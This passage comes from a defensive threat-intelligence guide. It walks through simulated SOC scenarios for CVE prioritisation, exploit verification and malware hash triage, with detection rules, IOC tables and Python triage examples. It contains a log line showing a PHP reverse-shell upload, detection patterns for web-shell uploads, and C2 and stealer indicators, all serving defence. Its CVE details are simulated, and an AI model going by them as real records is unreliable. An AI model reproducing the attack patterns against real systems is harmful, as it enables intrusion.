• Correlate CVEs with exploit availability and patch status.
Practical Application: During a vulnerability management cycle, the team discovers
multiple Fortinet devices running outdated firmware. Using CVE Details, they search
by vendor and model, finding several recent CVEs with high CVSS scores. The team
uses this data to prioritise firmware upgrades.
Scenario Simulation: Vulnerability Intelligence and Prioritisation Using CVE Details
Context
Objective: Assess the vulnerability landscape for Fortinet devices running outdated
firmware and prioritise patching based on severity and exploit data.
Tool: CVE Details
Environment:
• Assets: Fortinet FortiGate firewalls (firmware version 6.2.2)
• Inventory Source: Vulnerability Scanner (Nessus)
• Patch Management Platform: Ansible Tower
• Risk Management: CIS Controls + CVSSv3-based scoring
Step 1: Initial Vulnerability Discovery
Trigger:
Scheduled Nessus vulnerability scan reveals the following:
Asset | Firmware Version | Plugin Output
FG-300E | v6.2.2 | Multiple vulnerabilities (CVE-2024-XXXX series)
FG-100D | v6.2.2 | Outdated software warning
The security team flags these devices for further review.
Step 2: Deep-Dive via CVE Details
Procedure:
1. Navigate to [Link]
2. In the Search bar, enter:
Vendor: Fortinet
Product: FortiOS
3. Filter results:
o Year: 2024
o Score ≥ 7
o Type: Remote Code Execution, DoS, Privilege Escalation
Top CVEs Retrieved:
CVE ID | Score | Type | Summary
CVE-2024-27655 | 9.8 | RCE | Vulnerability in FortiOS SSL VPN allows unauthenticated RCE
CVE-2024-21902 | 8.6 | DoS | Crafted packet can crash IPS daemon
CVE-2024-18761 | 7.5 | PrivEsc | Local user privilege escalation through misconfigured daemon
Exploit Links and Patch Info:
• CVE-2024-27655 is linked to a public PoC and vendor advisory (available on Exploit-
DB and VulnCheck)
• Fortinet security advisory shows patch available in FortiOS v6.4.12 and v7.0.6+
Step 3: Risk Assessment and Correlation
Internal Analysis:
• Affected firmware: v6.2.2, vulnerable to all three CVEs
• Asset exposure:
o 3 devices are internet-facing VPN endpoints
o 2 devices are internally segmented but exposed to user traffic
Enrichment:
• Cross-checked against known exploits (via Exploit-DB and VulnCheck)
• Mapped to MITRE Techniques:
o T1190: Exploit Public-Facing Application
o T1068: Privilege Escalation
o T1499: Endpoint Denial of Service
Step 4: Response and Remediation Plan
Actions Taken:
• Firmware upgrade scheduled via Ansible Tower
• Emergency change request raised for the 3 internet-facing devices
• SOC added detection rules to monitor VPN endpoints for suspicious traffic
• SIEM alert created to detect exploit payload patterns from known CVEs
Patch Plan:
Device | Action | ETA
FG-300E | Immediate upgrade to v6.4.12 | Within 24 hours
FG-100D | Staged upgrade | Within 72 hours
Remaining | Scheduled during next maintenance window | Within 7 days
Step 5: Documentation and Lessons Learned
CVE Details Documentation:
• All discovered CVEs documented with:
o CVSS scores
o Exploit links
o Firmware fix version
o CVE-to-asset mapping
• Added into internal CVE tracking system
Policy Update:
• Fortinet firmware update cycle reduced from quarterly to monthly
• CVE Details now added to asset onboarding checklist for third-party devices
VULNCHECK
VulnCheck is a vulnerability intelligence platform that provides enriched, exploit-focused
threat intelligence, including metadata, exploitability status, real-world exploitation
evidence and links to PoCs and campaigns.
Use Cases:
• Determine whether a CVE has been weaponised or is being actively exploited in the
wild.
• Prioritise patching by combining CVSS with exploit availability and usage telemetry.
• Enrich vulnerability reports with intelligence on attack techniques and threat actors.
• Improve patch management workflows by focusing on high-risk vulnerabilities.
Practical Application: A zero-day CVE is disclosed affecting Microsoft Exchange.
VulnCheck shows it has already been used in targeted attacks by a known threat
group. The organisation moves immediately to apply mitigations and monitor related
IOCs.
Scenario Simulation: Exploit-Centric Risk Prioritisation Using VulnCheck
Context
Objective: Determine whether a recently disclosed Microsoft Exchange vulnerability is
actively exploited and prioritise patching based on exploitation telemetry and threat actor
activity.
Tool: VulnCheck ([Link])
Environment:
• Infrastructure: On-prem Microsoft Exchange Server 2019 (CU12)
• Exposure: Internet-facing OWA and ECP services
• Detection Stack: EDR + Elastic SIEM + Suricata IDS
Step 1: Initial Vulnerability Trigger
Trigger:
Microsoft issues a critical advisory for CVE-2025-21987 on Exchange Server (zero-day RCE
affecting ECP endpoint).
CVSS: 9.8 (Critical)
Patch not yet available (zero-day)
Security team needs to assess exploitability risk to determine mitigation urgency.
Step 2: Use of VulnCheck to Enrich CVE Details
Action:
1. Go to [Link]
2. Search: CVE-2025-21987
Findings from VulnCheck:
• Exploit Status: Weaponised
• Exploitation Evidence: Confirmed use in wild (APT29 campaign)
• Exploit Type: Remote command execution via specially crafted ECP POST request
• PoC: Limited public PoC available (weaponised version held by threat actor)
• Exploitation Telemetry: Surges in traffic to [Link] and ECP/[Link]
observed
• Threat Actor Link: Mapped to Russian-based group APT29 (UNC2452) targeting
email servers
• MITRE Mapping:
o T1190: Exploit Public-Facing Application
o T1071.001: Application Layer Protocol: Web Protocols
Step 3: Technical Impact Assessment and Detection Mapping
Enrichment Outcome:
Parameter | Value
CVE ID | CVE-2025-21987
CVSS | 9.8 (Critical)
Exploited in Wild | Yes
Confirmed Threat Group | Yes (APT29)
Network Indicator | URI pattern /ecp/[Link]
Exploit Type | Remote Code Execution
Known Exploits | Partial PoC on dark web; active weaponised campaigns
SIEM Detection Query (KQL in Kibana):
[Link].uri_path: "/ecp/[Link]" and user_agent: "*PowerShell*"
IDS Rule (Suricata Snort-like Signature; HTTP content on port 443 is only inspectable where TLS is terminated ahead of the sensor, e.g. behind the reverse proxy):
alert tcp $EXTERNAL_NET any -> $HOME_NET 443 (msg:"Possible Exchange RCE CVE-2025-21987"; flow:established,to_server; content:"POST"; http_method; content:"/ecp/[Link]"; http_uri; classtype:web-application-attack; sid:1000520; rev:1;)
Step 4: Response and Risk Mitigation
Actions Taken:
• Block external access to /ecp and /owa via reverse proxy until patch is released
• Deploy custom Suricata rule across perimeter
• Configure EDR rule to block suspicious PowerShell from [Link] (IIS worker
process)
• Apply Microsoft-recommended mitigations (remove vulnerable DLLs)
• VulnCheck intelligence integrated into SOC threat feed for IOCs
IOC Summary:
Indicator Type Value
URI /ecp/[Link]
User Agent Mozilla/5.0 (PowerShell)
Host [Link]
ASN AS12389 (Russia)
IP Range [Link]/24
Step 5: Documentation and Future Enhancement
Documentation Added:
• CVE-2025-21987 marked as Actively Exploited
• Linked to APT29 threat profile
• VulnCheck intelligence snapshot archived in Threat Wiki
• Detection logic committed to Elastic detection repo
SOC Playbook Updated:
• New section for "Zero-Day Response Workflow"
• VulnCheck added to CVE triage checklist
• Threat actor mapping module updated with APT29 recent TTPs
VULNERS
Vulners is a vulnerability intelligence search engine and API aggregator that collects data
from NVD, vendor advisories, exploit databases and security bulletins. It provides a unified
view of vulnerabilities, CVEs, exploits and patches.
Use Cases:
• Search for vulnerabilities across multiple data sources using one interface.
• Integrate with asset or vulnerability management systems via API.
• Correlate exploits, patches, CVEs and advisories in real time.
• Track exploit kits, PoC availability and patch history.
Practical Application: The vulnerability management team integrates Vulners into
their scanning tool. After a scan shows exposed MySQL servers, they use Vulners to
fetch the latest CVEs and check for associated exploits and vendor patches. The
report guides immediate remediation steps.
Scenario Simulation: Aggregated CVE and Exploit Intelligence Using Vulners
Context
Objective: Investigate exposed MySQL servers discovered during a network scan and
assess risk using aggregated vulnerability intelligence from Vulners.
Tool: Vulners ([Link])
Environment:
• Assets: 3 Linux-based MySQL 5.7 servers discovered in DMZ
• Scanner: Nessus → vulnerability data exported
• SIEM: Splunk with asset and vulnerability data indexed
• Integration: API access to Vulners for enrichment
Step 1: Detection of Exposed MySQL Assets
Trigger:
• Nessus scan detects:
o MySQL version 5.7.24
o Open to internet on port 3306
o Weak configuration (no SSL, no root password enforcement)
o CVEs identified: CVE-2022-32089, CVE-2023-21882
Step 2: Using Vulners for CVE Intelligence
Action:
1. Navigate to [Link]
2. Search for each CVE individually:
o CVE-2022-32089
o CVE-2023-21882
3. Review full CVE details, vendor advisories, PoC links and patch availability
Findings from Vulners:
CVE ID         | Summary                             | CVSS | Exploit Available | PoC Available    | Patch Available
CVE-2022-32089 | MySQL Improper Privilege Escalation | 8.2  | Yes               | Yes (GitHub PoC) | Yes (Oracle Patch)
CVE-2023-21882 | MySQL DoS via crafted queries       | 6.5  | No                | No               | Yes
Correlated Data:
• Vendor Advisory: Oracle July 2022 CPU
• Exploit DB Entry: Found for CVE-2022-32089
• Patch Release Date: 15 July 2022
• Affected Versions: 5.7.24 – 5.7.32
Step 3: Correlation with Asset Data
Action:
• Use Vulners API to automate lookup for multiple CVEs:
curl -X POST [Link] -d '{"query":"CVE-2022-32089 OR CVE-2023-21882"}'
Enrichment Outcome:
• Confirmed both CVEs affect installed MySQL version
• CVE-2022-32089 has active exploitation attempts logged in dark web forums
• Patch already available since 2022, but missing in production servers
Step 4: Risk Assessment and Remediation
Risk Prioritisation:
Asset Vulnerability Exploitability Action
MySQL-01 CVE-2022-32089 High Immediate patching, EDR rules deployed
MySQL-02 CVE-2023-21882 Medium Patch during next maintenance window
MySQL-03 CVE-2022-32089 High Access restricted until patching
Detection Query for Exploitation Attempt (Splunk):
index=network_traffic dest_port=3306 AND (query="GRANT ALL" OR query="SET GLOBAL")
Step 5: Documentation and Process Integration
Vulnerability Wiki Entry:
• Linked Vulners CVE pages
• Mapped to MITRE ATT&CK T1210 (Exploitation of Remote Services)
• Noted available PoC and vendor patch links
Vulnerability Management Playbook Updated:
• Vulners API integrated into CVE enrichment pipeline
• Added rule: “High CVSS + Public Exploit + Patch Missing = Critical Risk”
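The prioritisation rule above, and the exploit-status enrichment from the VulnCheck scenario before it, can be expressed as a small scoring routine. The following is an added example (not the page's code and not VulnCheck's or Vulners' API): it takes records shaped like the two enrichment tables, checks whether an installed version falls inside the advisory's affected range, and applies "High CVSS + Public Exploit + Patch Missing = Critical Risk". The field names, the asset inventory and the Exchange version string are constructed for the example; the CVE figures are the ones the scenarios state.

```python
"""Exploit-centric CVE prioritisation (added example, not the page's or any vendor's code).

Implements the playbook rule "High CVSS + Public Exploit + Patch Missing = Critical Risk"
over records shaped like the VulnCheck and Vulners enrichment tables, and checks whether
an installed version falls inside the advisory's affected range. Field names, the
Exchange version string and the asset inventory are constructed for this example.
"""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class CveIntel:
    cve_id: str
    product: str
    cvss: float
    exploit_status: str                 # "none" | "poc" | "weaponised"
    exploited_in_wild: bool
    vendor_patch_available: bool
    affected_range: Optional[Tuple[str, str]] = None   # inclusive (min, max); None = not published


@dataclass(frozen=True)
class Asset:
    name: str
    product: str
    installed_version: str
    patched_cves: FrozenSet[str] = frozenset()          # vendor patches confirmed applied


def parse_version(version: str) -> Tuple[int, ...]:
    """'5.7.24' -> (5, 7, 24) so that versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_affected(asset: Asset, intel: CveIntel) -> bool:
    """Product must match; with no published range we fail closed and treat the asset as affected."""
    if asset.product != intel.product:
        return False
    if intel.affected_range is None:
        return True
    low, high = intel.affected_range
    return parse_version(low) <= parse_version(asset.installed_version) <= parse_version(high)


def prioritise(asset: Asset, intel: CveIntel) -> str:
    """Return remediated, not_affected, critical, high, medium or low."""
    if intel.cve_id in asset.patched_cves:
        return "remediated"
    if not is_affected(asset, intel):
        return "not_affected"
    public_exploit = intel.exploit_status in ("poc", "weaponised")
    # Reaching this point means the patch is missing on the asset (not applied, or not yet
    # released), so the page's rule reduces to: high CVSS + public exploit => critical.
    if intel.exploited_in_wild or (intel.cvss >= 7.0 and public_exploit):
        return "critical"
    if intel.cvss >= 7.0:
        return "high"
    if intel.cvss >= 4.0 or public_exploit:
        return "medium"
    return "low"


def recommended_action(asset: Asset, intel: CveIntel) -> str:
    priority = prioritise(asset, intel)
    if priority in ("remediated", "not_affected"):
        return "none"
    if not intel.vendor_patch_available:
        return "apply vendor mitigations and restrict exposure until a patch ships"
    if priority == "critical":
        return "patch immediately"
    return "patch in next maintenance window"


PRIORITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "remediated": 4, "not_affected": 5}


def triage(assets: List[Asset], intel: List[CveIntel]) -> List[Tuple[str, str, str, str]]:
    """Cross every asset with every CVE and sort the worst findings first."""
    rows = [(a.name, i.cve_id, prioritise(a, i), recommended_action(a, i)) for a in assets for i in intel]
    return sorted(rows, key=lambda r: (PRIORITY_ORDER[r[2]], r[0], r[1]))


# Intelligence records mirroring the two scenarios above (values as the page states them).
INTEL = [
    CveIntel("CVE-2025-21987", "exchange", 9.8, "weaponised", True, False),
    CveIntel("CVE-2022-32089", "mysql", 8.2, "poc", False, True, ("5.7.24", "5.7.32")),
    CveIntel("CVE-2023-21882", "mysql", 6.5, "none", False, True),
]

# Constructed inventory: MySQL-02 has the Oracle patch applied; EXCH-01's version is a placeholder.
ASSETS = [
    Asset("MySQL-01", "mysql", "5.7.24"),
    Asset("MySQL-02", "mysql", "5.7.24", frozenset({"CVE-2022-32089"})),
    Asset("MySQL-03", "mysql", "5.7.24"),
    Asset("EXCH-01", "exchange", "15.2"),
]

if __name__ == "__main__":
    for name, cve, priority, action in triage(ASSETS, INTEL):
        print(f"{name:10} {cve:16} {priority:13} {action}")
```

The version comparison is the part most often got wrong in home-grown scripts: comparing "5.7.24" to "5.7.32" as strings happens to work, but "5.7.9" versus "5.7.10" does not, hence the tuple conversion.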
ATT&CK Navigator Updated:
Technique ID | Technique Name                  | Notes
T1210        | Exploitation of Remote Services | MySQL exposed and targeted via CVE-2022-32089
PACKET STORM SECURITY
Packet Storm Security is a long-standing archive of security tools, advisories, exploits,
whitepapers and news related to cybersecurity. It often hosts new exploits and disclosures
not yet listed in NVD or Exploit-DB.
Use Cases:
• Monitor the latest vulnerability disclosures and zero-day exploit releases.
• Research less common or emerging threats before they become mainstream.
• Access tools and scripts used for penetration testing or red team simulations.
• Cross-reference PoCs with internal detections for early warning.
Practical Application: A SOC team investigating abnormal activity finds traffic
suggesting exploitation of a rare open-source CMS. Packet Storm Security hosts a
newly released exploit for the same CMS version, confirming the likely root cause and
guiding containment actions.
Scenario Simulation: Early Threat Verification Using Packet Storm Security
Context
Objective: Investigate abnormal traffic patterns potentially linked to exploitation of a rarely
used content management system (CMS), using Packet Storm Security to validate PoC
availability and threat status
Tool: Packet Storm Security
Environment:
• Web Server: Open-source CMS (v4.3.2) hosted in DMZ
• Firewall Logs: Suricata alerts on unknown HTTP payloads
• SIEM: QRadar
• Threat Hunting Tool: Custom HTTP parser with decoded logs
Step 1: Initial Detection
Trigger:
SOC receives Suricata alerts:
• Rule: ET WEB_SERVER Possible CMS Arbitrary File Upload
• Destination IP: Public-facing CMS server
• URI Pattern: /[Link]?file=...
Log Excerpt:
timestamp="2025-08-01T10:22:45Z"
src_ip="[Link]"
dst_ip="[Link]"
uri="/[Link]?file=php_reverse_shell.php"
method="POST"
http_user_agent="curl/7.68.0"
Step 2: Using Packet Storm Security for Exploit Verification
Action:
1. Analyst navigates to [Link]
2. Searches for:
CMSName 4.3.2 file upload exploit
3. A new advisory dated 2025-07-30 is discovered titled:
“Remote Code Execution in CMSName v4.3.2 via Improper File Validation”
Findings from Packet Storm:
Field Value
Exploit Type Remote Code Execution (RCE)
Exploit Availability Yes – Public Python script + Metasploit module
Verified Yes – Confirmed working by researcher
PoC Location GitHub + local mirror on Packet Storm
Exploit Technique Upload unrestricted .php shell via /[Link] endpoint
CVE Mapped Pending assignment
Affected Versions CMS v4.3.0 to v4.3.2
Step 3: Threat Correlation and IOC Mapping
Correlation in QRadar:
• Matches HTTP logs to exploit pattern
• Enriches alert with Packet Storm metadata
• Adds tag: potential_rce_upload_exploit
• Identifies same source IP reattempting with variations of the filename ([Link],
[Link])
Step 4: Mitigation and Containment
Response:
Action Item Status
Block source IP at firewall Done
Enable WAF on /[Link] route In progress
Patch CMS to v4.3.4 Scheduled today
Forensic image of web server taken Done
IOC sweep across other web assets Ongoing
Detection Query for SIEM (QRadar AQL):
SELECT * FROM events
WHERE URI CONTAINS "/[Link]"
AND URL_FILENAME ENDSWITH ".php"
AND METHOD = "POST"
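The AQL rule above, run offline. This is an added example, not the page's code and not a QRadar feature: it parses constructed key="value" events in the same layout as the Step 1 log excerpt and flags POSTs to the upload handler whose file name carries a PHP-executable extension. Unlike an ENDSWITH ".php" check it looks at every extension segment, so case variants (shell.PHTML) and double extensions (image.php.jpg) are caught, and it counts attempts per source so the reattempts noted in Step 3 stand out. The upload endpoint is an assumed placeholder because the page redacts the real CMS path; the IP addresses are documentation ranges.

```python
"""Detection of web-shell style uploads in HTTP logs (added example, not the page's or any vendor's code).

Offline equivalent of the QRadar AQL query, run over constructed key="value" events in the
layout of the Step 1 log excerpt. The upload endpoint is an assumed placeholder because the
page redacts the real CMS path.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

UPLOAD_ENDPOINT = "/upload"   # assumed placeholder for the redacted CMS upload handler
# Extensions that common PHP handler configurations execute; compared case-insensitively.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

KV_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key="value" log line into a dict (values are not expected to contain quotes)."""
    return dict(KV_RE.findall(line))


def php_extension_hit(filename: str) -> bool:
    """True if any extension segment is PHP-executable.

    Every segment after the base name is checked, so double extensions such as
    shell.php.jpg are flagged as well as plain shell.php; an ENDSWITH ".php" check misses them.
    """
    segments = filename.lower().split(".")
    return any(segment in PHP_EXTENSIONS for segment in segments[1:])


def inspect_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert record for a POST to the upload endpoint naming a PHP file, else None."""
    if event.get("method", "").upper() != "POST":
        return None
    parts = urlsplit(event.get("uri", ""))
    if parts.path != UPLOAD_ENDPOINT:
        return None
    filename = parse_qs(parts.query).get("file", [""])[0]   # parse_qs percent-decodes the value
    if not php_extension_hit(filename):
        return None
    return {
        "timestamp": event.get("timestamp", ""),
        "src_ip": event.get("src_ip", ""),
        "dst_ip": event.get("dst_ip", ""),
        "filename": filename,
        "user_agent": event.get("http_user_agent", ""),
    }


def detect(lines: List[str]) -> Tuple[List[Dict[str, str]], Counter]:
    """Run the rule over raw lines; also count attempts per source so reattempts stand out."""
    alerts = [alert for alert in (inspect_event(parse_event(line)) for line in lines) if alert]
    per_source = Counter(alert["src_ip"] for alert in alerts)
    return alerts, per_source


# Constructed sample events: one source retrying with extension variants, one benign upload, one GET.
SAMPLE_LOGS = [
    'timestamp="2025-08-01T10:22:45Z" src_ip="203.0.113.10" dst_ip="192.0.2.20" uri="/upload?file=php_reverse_shell.php" method="POST" http_user_agent="curl/7.68.0"',
    'timestamp="2025-08-01T10:23:01Z" src_ip="203.0.113.10" dst_ip="192.0.2.20" uri="/upload?file=shell.PHTML" method="POST" http_user_agent="curl/7.68.0"',
    'timestamp="2025-08-01T10:23:20Z" src_ip="203.0.113.10" dst_ip="192.0.2.20" uri="/upload?file=image.php.jpg" method="POST" http_user_agent="curl/7.68.0"',
    'timestamp="2025-08-01T10:24:00Z" src_ip="198.51.100.5" dst_ip="192.0.2.20" uri="/upload?file=holiday.jpg" method="POST" http_user_agent="Mozilla/5.0"',
    'timestamp="2025-08-01T10:24:10Z" src_ip="198.51.100.5" dst_ip="192.0.2.20" uri="/upload?file=shell.php" method="GET" http_user_agent="Mozilla/5.0"',
]

if __name__ == "__main__":
    alerts, per_source = detect(SAMPLE_LOGS)
    for alert in alerts:
        print(alert)
    print("attempts per source:", dict(per_source))
```

The same logic translates back into AQL by replacing ENDSWITH ".php" with a LIKE or regex match over the whole file name; the point is that the detection keys on the extension chain, not on the last four characters.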
Step 5: Documentation and Reporting
Exploit Reference Added:
• Packet Storm advisory and download link
• Exploit script archived internally
• Note on unassigned CVE: temporary internal ID created
Security Wiki Update:
Field Value
Tool Used Packet Storm Security
Technique Mapped MITRE ATT&CK T1190 – Exploit Public-Facing App
PoC Status Public exploit confirmed
Risk Level High – External RCE
Response Tracked Yes – Logged in IR platform
Playbook Updated:
• Section for “CMS Exploitation Response”
• Added automated detection rule based on file extension and URI pattern
8. HASH AND FILE REPUTATION LOOKUP
VIRUSTOTAL
VirusTotal is a multi-engine malware scanning platform that aggregates antivirus verdicts,
behavioural analysis and metadata from files, URLs and IPs. For hash lookups, it allows
analysts to search for known samples using SHA256, SHA1 or MD5 and view associated
data.
Use Cases:
• Check if a file hash is known and has been submitted before.
• View antivirus detection names and verdicts from over 70 AV engines.
• Analyse behavioural data, relationships (e.g., dropped files, contacted domains)
and sandbox reports.
• Track when and where a file was first seen.
Practical Application: A suspicious EXE is found on an endpoint. The hash is
submitted to VirusTotal, where it is detected by multiple AV engines as a keylogger.
The metadata reveals it communicates with known C2 domains, confirming malicious
intent and prompting isolation.
Scenario Simulation: Malware Hash Triage Using VirusTotal
Context
Objective: Investigate a suspicious executable discovered during an EDR sweep by
verifying the hash through VirusTotal for AV verdicts, metadata and behaviour analysis
Tool: VirusTotal
Environment:
• Endpoint Detection and Response (EDR): Detects unknown binary running from a
temp folder
• SIEM: Splunk with endpoint telemetry
• EDR Export: Hashes of unknown binaries sent for triage
Step 1: Detection of Suspicious Executable
Trigger:
EDR agent flags a new file:
• Path: C:\Users\John\AppData\Local\Temp\[Link]
• Behaviour: Executes at login, connects to external IP, modifies registry keys
Extracted metadata:
Field        | Value
File Name    | [Link]
SHA256       | 6b5a9a30b9b4a52e5f25cf9be6a70d3c16d3ea57c79ac259be0fbe93ab27ae69
Parent Proc  | [Link]
Registry Mod | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\winhost
Step 2: Using VirusTotal for Hash Intelligence
Action:
1. Navigate to [Link]
2. Paste the SHA256 hash in the search bar
3. Review the results
Findings from VirusTotal:
Field Value
Detections 47 / 70 engines detect as [Link], [Link]
Behavioural Report Connects to hxxp://[Link]
Relationships Drops additional DLL file [Link]
First Submission 2025-07-28 03:12 UTC
Threat Labels Keylogger, Persistence, C2 Communication
Relevant Tags from VirusTotal:
• keylogger
• persistence
• rat
• auto-start
• dropper
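What the analyst reads off the VirusTotal page in Step 2 can be pulled from the v3 API and summarised automatically. The following is an added example, not the page's code and not VirusTotal's client library: it builds the request for the real v3 file-object endpoint (GET https://www.virustotal.com/api/v3/files/{sha256} with an x-apikey header), then summarises a response and applies the Step 5 auto-triage rule (auto-start registry + external HTTP + new binary). The response is constructed in the shape of a v3 file object so the block runs offline; its figures mirror the table above (47/70 engines, first seen 2025-07-28 03:12 UTC). The verdict thresholds, the threat label string and the EDR flags are this example's assumptions.

```python
"""VirusTotal hash-lookup triage (added example, not the page's or VirusTotal's code).

Builds the request for the real v3 file-object endpoint and summarises a response. The
response below is constructed to mirror the scenario's findings in the shape of a v3 file
object; the verdict thresholds and the EDR auto-triage rule are this example's assumptions.
"""
import re
from datetime import datetime, timezone
from typing import Any, Dict, Tuple

VT_FILE_URL = "https://www.virustotal.com/api/v3/files/{sha256}"
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def build_request(sha256: str, api_key: str) -> Tuple[str, Dict[str, str]]:
    """Validate the hash before it goes into a URL and return (url, headers) for a GET."""
    sha256 = sha256.strip().lower()
    if not SHA256_RE.match(sha256):
        raise ValueError("expected a 64-hex-character SHA256")
    return VT_FILE_URL.format(sha256=sha256), {"x-apikey": api_key, "accept": "application/json"}


def detection_ratio(response: Dict[str, Any]) -> Tuple[int, int]:
    """(malicious, engines that returned a verdict); timeouts and unsupported types are excluded."""
    stats = response["data"]["attributes"]["last_analysis_stats"]
    engines = sum(stats.get(k, 0) for k in ("malicious", "suspicious", "undetected", "harmless"))
    return stats.get("malicious", 0), engines


def verdict(response: Dict[str, Any]) -> str:
    """Assumed thresholds: >=10 engines or >=25% of engines -> malicious; >=3 -> suspicious."""
    malicious, engines = detection_ratio(response)
    if engines == 0:
        return "unknown"
    if malicious >= 10 or malicious / engines >= 0.25:
        return "malicious"
    if malicious >= 3:
        return "suspicious"
    return "undetected"


def summarise(response: Dict[str, Any]) -> Dict[str, Any]:
    attrs = response["data"]["attributes"]
    malicious, engines = detection_ratio(response)
    first_seen = datetime.fromtimestamp(attrs["first_submission_date"], tz=timezone.utc)
    return {
        "sha256": response["data"]["id"],
        "detections": f"{malicious}/{engines}",
        "verdict": verdict(response),
        "first_seen": first_seen.strftime("%Y-%m-%d %H:%M UTC"),
        "threat_label": attrs.get("popular_threat_classification", {}).get("suggested_threat_label"),
        "tags": sorted(attrs.get("tags", [])),
    }


def auto_triage(response: Dict[str, Any], edr: Dict[str, bool]) -> str:
    """Step 5 playbook rule: a new binary with an auto-start key and external HTTP is isolated
    even while reputation is unknown; a malicious verdict isolates on its own."""
    v = verdict(response)
    behavioural = edr.get("new_binary") and edr.get("autostart_registry") and edr.get("external_http")
    if v == "malicious" or behavioural:
        return "isolate"
    if v == "suspicious":
        return "analyst_review"
    return "monitor"


# Constructed response in v3 file-object shape; the numbers mirror the scenario table.
SAMPLE_RESPONSE = {
    "data": {
        "id": "6b5a9a30b9b4a52e5f25cf9be6a70d3c16d3ea57c79ac259be0fbe93ab27ae69",
        "type": "file",
        "attributes": {
            "last_analysis_stats": {"malicious": 47, "suspicious": 0, "undetected": 23, "harmless": 0,
                                    "timeout": 2, "type-unsupported": 0, "failure": 0},
            "first_submission_date": 1753672320,   # 2025-07-28T03:12:00Z
            "tags": ["keylogger", "persistence", "rat", "auto-start", "dropper"],
            "popular_threat_classification": {"suggested_threat_label": "trojan.keylogger/generic"},
        },
    }
}
SAMPLE_EDR = {"new_binary": True, "autostart_registry": True, "external_http": True}   # constructed

if __name__ == "__main__":
    print(summarise(SAMPLE_RESPONSE))
    print("action:", auto_triage(SAMPLE_RESPONSE, SAMPLE_EDR))
```

Two details matter in production: the denominator excludes engines that timed out, so "47/70" is a ratio of verdicts rather than of engines polled, and the hash is validated before it is interpolated into the URL so an analyst's paste of a file name or a defanged string never reaches the API.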
Step 3: Threat Correlation in SIEM
Action:
Search for related endpoint and network indicators:
Splunk Query:
index=edr_logs OR index=network_traffic
| search file_name="[Link]" OR
file_hash="6b5a9a30b9b4a52e5f25cf9be6a70d3c16d3ea57c79ac259be0fbe93ab27ae69"
Enrichment:
• Connections to IP: [Link]
• DNS lookup for [Link] confirmed in logs
• Registry persistence observed in 3 other endpoints
Step 4: Response Actions
Action Item Status
File isolated by EDR Done
C2 domain [Link] blocked Done
IOC sweep initiated across estate In progress
Registry cleanup script deployed Done
User account flagged for review Done
Step 5: Documentation and Playbook Update
Malware Wiki Entry:
Field Value
Tool Used VirusTotal
SHA256 6b5a9a30...
Verdict Malicious – Keylogger
First Seen 2025-07-28
Communication [Link], TCP port 80
Detection Mapped MITRE T1056.001 – Input Capture: Keylogging
Playbook Updated:
• Section for “Hash Lookup and Isolation Workflow”
• Automated triage rule added for auto-start registry + external HTTP + new binary
• Hash added to EDR global block list
HYBRID ANALYSIS
Hybrid Analysis allows hash-based lookups that return detailed static and dynamic
behavioural reports of files. It correlates samples to known malware families and provides
community scoring, process trees and MITRE ATT&CK mappings.
Use Cases:
• Search by hash to find previous submissions and dynamic analysis reports.
• Determine malware behaviour including registry access, file manipulation and
outbound connections.
• View dropped files, screenshots and system call logs.
• Use community and threat score to assess maliciousness.
Practical Application: A hash of a suspicious DLL is found in a client’s endpoint scan.
The analyst checks it in Hybrid Analysis, which returns a detailed report showing
credential dumping activity and classification as part of the RedLine Stealer family.
This confirms the threat.
Scenario Simulation: Dynamic Malware Behaviour Analysis Using Hybrid Analysis
Context
Objective: Investigate a suspicious DLL file discovered in an endpoint memory dump using
Hybrid Analysis for static and dynamic behaviour analysis
Tool: Hybrid Analysis
Environment:
• Endpoint Memory Dump reveals DLL injection
• File extracted and hashed for analysis
• Hybrid Analysis used for hash-based threat confirmation and behavioural insights
Step 1: Suspicious DLL Identified During Memory Analysis
Trigger:
Threat hunting team inspects a suspicious process on an infected host. Memory dump
reveals:
• Injected DLL: [Link]
• Observed within process [Link]
• Memory access patterns suggest credential harvesting
Extracted Metadata:
Field              | Value
File Name          | [Link]
SHA256             | 4ea5f3c212df69d670a1791c755ee229a3de63e3c87b5e96c5f942b8ed875a45
Parent Process     | [Link]
Detected Behaviour | Reads [Link] memory
Step 2: Using Hybrid Analysis for Hash Lookup
Action:
1. Navigate to [Link]
2. Enter the hash:
4ea5f3c212df69d670a1791c755ee229a3de63e3c87b5e96c5f942b8ed875a45
3. View the behavioural report and malware family classification
Key Results:
Category Details
Verdict Malicious – High Threat Score
Threat Score 95/100
Malware Family RedLine Stealer
ATT&CK Mapping T1003 – OS Credential Dumping
Behaviour Reads [Link], drops file [Link], contacts C2
Registry Changes Persistence via HKCU\Run
Network Activity HTTP POST to stealerpanel[.]ru
Dropped Files [Link], [Link]
Process Tree [Link] → [Link] → [Link]
Screenshots Shows [Link] execution and registry edits
Step 3: Correlation and Telemetry Review
Splunk Query to Detect Related Activity:
index=edr_logs OR index=procmon
| search process_name="[Link]" file_path="*[Link]*" OR
registry_path="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
Findings:
• Multiple endpoints show execution of [Link] via [Link]
• Same registry persistence path observed
• Outbound traffic to stealerpanel[.]ru from 2 infected hosts
Step 4: Response Actions
Action Status
Infected machines isolated Completed
Hash blocked in EDR Completed
IOCs pushed to XDR and proxy Completed
Sweep initiated using Hybrid tags Ongoing
RedLine Stealer threat advisory published internally Completed
Step 5: Documentation and Playbook Update
Threat Wiki Entry:
Field Value
Tool Used Hybrid Analysis
Hash 4ea5f3c212...
Verdict Malicious – RedLine Stealer
Behaviour Summary Credential Dumping, Persistence, C2 Communication
ATT&CK Mapping T1003, T1055, T1059
Playbook Updates:
• Add Hybrid Analysis hash lookup to incident triage SOP
• Include YARA rules from dropped file analysis
• Add rule for [Link] launching unknown DLLs from %APPDATA%
JOE SANDBOX
Joe Sandbox provides advanced hash lookups with detailed multi-layered analysis reports
